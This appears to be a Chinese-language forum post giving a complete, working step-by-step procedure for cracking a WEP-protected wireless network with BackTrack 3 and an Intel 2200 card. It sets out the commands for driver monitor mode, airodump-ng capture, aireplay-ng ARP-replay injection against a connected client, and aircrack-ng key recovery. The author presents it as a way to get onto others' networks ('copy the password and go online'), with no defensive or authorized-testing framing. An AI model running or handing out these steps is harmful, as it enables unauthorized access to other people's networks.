刚在BT3下用2200破解了一个wep加密了的无线网络，写一下具体的方法，我想2200的卡还是非常普及的，有兴趣的可以试试看。
完整的命令如下
rmmod ipw2200
modprobe ipw2200 rtap_iface=1
iwconfig eth1 ap <AP MAC>
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
fconfig eth1 up
ifconfig rtap0 up
airodump-ng --channel <Access Point channel> --bssid <AP MAC> -w dumpfile rtap0
这时你观察station下面是不是有对方的机器，如果客户端有在上网，那么station下面就会有对方的MAC,记下来。
5、打开新的窗口，输入
aireplay-ng --arpreplay -b <AP MAC> -h <客户机的 MAC> -i rtap0 eth1
此时如果对方有客户端在上网，那么DATA的数据会增加，我刚才的情况是有客户端，但是RXQ信号很弱，差不多只有13左右，10分钟才增加了300个 date，不过10分钟后RXQ超过50，接着DATA极速增加，此时在第5步打开的窗口中，ARP得到的数据也会同时增加。
6、当DATA超过100000后，打开新的窗口，输入
aircrack-ng -z -b <AP MAC> dumpfile*.cap
然后就大功告成，抄下密码，上网去吧，嘿嘿。
上面就是BT3光盘启动下，最简单的破解有客户端WEP的全部过程，如果信号好的话，估计也就10来分钟搞定。
Ps：上面命令中的< >是不需要的。

国外的网站上专门有一篇介绍2200破解的，具体原理可参考 http://tinyshell.be/aircrackng/forum/index.php?topic=1775.0